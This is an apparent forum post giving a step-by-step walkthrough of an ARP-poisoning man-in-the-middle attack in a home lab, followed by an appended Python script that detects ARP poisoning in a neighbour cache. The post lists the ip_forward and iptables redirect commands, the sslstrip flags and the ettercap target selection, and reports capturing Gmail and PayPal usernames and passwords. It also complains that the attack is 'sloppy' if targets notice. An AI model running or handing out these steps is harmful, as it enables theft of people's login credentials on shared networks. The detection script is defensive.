I attempted to respond all last week but the forums were down every time I tried.
I finally got the whole process to work, though I'm not sure what I did differently. The only thing I changed was that I ran ettercap in GUI mode. The whole process for me was as follows, for anyone else who finds themselves having the same problem I was having.
BT4 - Attacker (on VMWare): 192.168.1.6 - Wireless, bridged, iface - eth0
Ubuntu64 - Victim (on VMWare): 192.168.1.9
Router (Default Gateway) - Asus RT-N10: 192.168.1.1
1. Edit etter.conf as instructed in the tutorial
2. echo 1 > /proc/sys/net/ipv4/ip_forward
3. Check /proc/.../ip_forward
output should be '1'
4. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5. (in a new konsole) sslstrip -a -k -f
6. ettercap -G
##At this point, Ettercap GUI will pop up -- follow these steps##
7. Sniff-> Unified Sniffing-> Network Interface: eth0
8. Hosts-> Scan for Hosts
9. Hosts-> Hosts List (H)
10. Select 192.168.1.1 (gateway)-> Click 'Add to Target 1'
11. Select 192.168.1.9 (victim)-> Click 'Add to Target 2'
12. MITM-> Arp Poisoning-> Check 'Sniff Remote Connections'-> Ok
13. Start-> Start Sniffing
##Switch to victim machine and log into gmail or paypal##
14. Observe USER and PASS coming through in Ettercap's output window.
15. End the MITM, stop sniffing, kill sslstrip, and run iptables --flush when you're all done.
Everything works as it should -- I'm not sure why running the GUI made any difference. The only other problem I'm having in the whole process is that probably about 66% of the time when trying to log into gmail or paypal, it doesn't go through properly. I collect the username and password without any problem but it seems to just refresh the gmail login screen more than half the time, rather than taking me to the inbox. It still gets the job done, but if they're alerted to an ARP spoofing it makes the process a little sloppy.
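
Added example (not part of the original post): a check, run from the victim's side, for the traces the ARP poisoning in step 12 leaves in a host's neighbour cache. It parses `ip neigh show` output and flags a gateway MAC that differs from a recorded baseline, or a second IP that shares the gateway's MAC. The function names, the baseline value and every MAC address are assumptions made up for illustration; the IPs reuse the lab addresses above.

```python
import re
from collections import defaultdict

# Matches `ip neigh show` lines such as:
#   192.168.1.1 dev eth0 lladdr 02:00:00:00:01:01 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.I)

def parse_neigh(text):
    """Return {ip: mac}; entries without a MAC (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(table, gateway_ip, baseline_gateway_mac=None):
    """Flag the two traces ARP poisoning leaves in a victim's neighbour cache."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return findings
    # 1. Gateway IP now resolves to a MAC other than the recorded baseline.
    if baseline_gateway_mac and gw_mac != baseline_gateway_mac.lower():
        findings.append(("gateway_mac_changed", gateway_ip, gw_mac))
    # 2. Another host's IP shares the gateway's current MAC.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    sharers = tuple(sorted(ip for ip in by_mac[gw_mac] if ip != gateway_ip))
    if sharers:
        findings.append(("gateway_mac_shared", gw_mac, sharers))
    return findings

# Constructed snapshots; all MAC addresses are made up for illustration.
BASELINE_GW_MAC = "02:00:00:00:01:01"
CLEAN = """192.168.1.1 dev eth0 lladdr 02:00:00:00:01:01 REACHABLE
192.168.1.6 dev eth0 lladdr 02:00:00:00:06:06 STALE
192.168.1.50 dev eth0  FAILED"""
POISONED = """192.168.1.1 dev eth0 lladdr 02:00:00:00:06:06 REACHABLE
192.168.1.6 dev eth0 lladdr 02:00:00:00:06:06 STALE"""

if __name__ == "__main__":
    for name, snap in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_arp_anomalies(parse_neigh(snap), "192.168.1.1", BASELINE_GW_MAC))
```

The baseline comparison still fires when the other host's own entry is absent from the cache, which is why both checks are kept.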